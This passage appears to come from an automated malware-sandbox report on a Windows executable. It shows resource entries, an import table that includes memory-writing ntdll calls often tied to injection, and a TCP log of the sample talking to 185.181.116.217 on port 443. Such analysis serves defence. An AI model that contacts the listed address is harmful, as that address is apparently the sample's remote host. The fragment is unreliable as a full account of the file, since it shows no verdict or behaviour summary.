                                                                                          RT_GROUP_CURSOR0x10651c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                          RT_GROUP_ICON0x1065300x5adata0.8222222222222222

                                                                                          Imports

                                                                                          DLLImport
                                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                          user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                          kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                          user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                          kernel32.dllSleep
                                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                          ole32.dllCoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                          oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
                                                                                          comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                          ntdllNtWriteVirtualMemory, NtProtectVirtualMemory
                                                                                          uRLTelnetProtocolHandler
                                                                                          ntdllNtQueryInformationFile, NtOpenFile, NtClose, NtReadFile
                                                                                          ntdllRtlDosPathNameToNtPathName_U

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Aug 23, 2023 19:30:31.856199980 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:31.856302977 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:31.856439114 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:31.889179945 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:31.889261007 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:31.974450111 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:31.974618912 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:31.979082108 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:31.979120016 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:31.979728937 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:32.130261898 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.594521999 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.629255056 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.662327051 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.662370920 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.662446022 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.662498951 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.662524939 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.662533045 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.662579060 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.662580967 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.662605047 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.662640095 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.662663937 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.662926912 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.662955999 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.663012981 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.663037062 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.663048029 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.663074970 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.663110018 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.663129091 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.663132906 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.695588112 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.695688963 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.695704937 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.695725918 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.695811033 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.695856094 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.695880890 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.696049929 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.696084023 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.696108103 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.696125984 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.696141005 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.696145058 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.696171045 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.728323936 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.728396893 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.728578091 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.728650093 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.728714943 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.728774071 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.728842974 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.728864908 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.728873014 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.728919029 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.728950024 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.729008913 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.729062080 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.729089975 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.729110956 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.729135990 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.729553938 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.729598999 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.729657888 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.729684114 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.729707003 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.730218887 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.730271101 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.730308056 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.730340004 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.730361938 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.730953932 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.730999947 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.731040001 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.731065989 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.731089115 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.764477015 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.764553070 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.764658928 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.764714003 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.764741898 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.765156031 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.765201092 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.765235901 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.765260935 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.765290022 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.765979052 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.766033888 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.766077042 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.766103983 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.766128063 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.766767979 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.766817093 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.766855001 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.766876936 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.766904116 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.767668962 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.767731905 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.767764091 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.767797947 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.767827034 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.768452883 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.768517971 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.768565893 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.768596888 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.768624067 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.769231081 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.769292116 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.769352913 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.769397974 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.769422054 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.769776106 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.769819975 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.769859076 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.769875050 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.769896984 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.789217949 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.805114031 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.805216074 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.805401087 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.805401087 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.805457115 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.805500984 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.805500984 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.805510998 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.805593014 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.805620909 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.805685043 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.805731058 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.805767059 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.805799961 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.805838108 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.837351084 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837424040 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837524891 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.837558031 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837588072 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837629080 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837635994 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.837662935 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.837677956 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837698936 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.837779999 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837826967 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837845087 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.837862015 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837897062 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.837938070 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.837986946 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.838043928 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.838066101 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.838080883 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.838378906 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.838433027 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.838470936 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.838490009 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.838507891 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.839059114 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.839107037 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.839171886 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.839186907 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.839204073 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.839273930 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.870009899 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.870060921 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.870157003 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.870228052 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.870261908 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.870275021 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.870299101 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.870343924 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.870376110 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.870408058 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.870891094 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.870920897 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.871006012 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.871037960 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.871068001 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.871428013 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.871493101 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.871547937 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.871581078 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.871613026 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.872281075 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.872312069 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.872365952 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.872402906 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.872440100 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.872999907 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.873037100 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.873091936 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.873126984 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.873159885 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.873557091 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.873585939 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.873636961 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.873668909 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.873698950 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.874130011 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.874165058 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.874206066 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.874237061 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.874270916 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.874697924 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.874731064 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.874780893 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.874813080 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.874845028 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.876600981 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.908026934 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.908081055 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.908199072 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.908273935 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.908282995 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.908344030 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.908389091 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.908389091 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.908427954 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.908597946 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.908634901 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.908708096 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.908742905 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.908780098 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.908804893 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.909008026 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.909039974 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.909106016 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.909143925 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.909176111 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.909199953 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.909332037 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.909358978 CEST44349727185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:30:33.909429073 CEST49727443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:30:33.909461021 CEST44349727185.181.116.217192.168.2.3
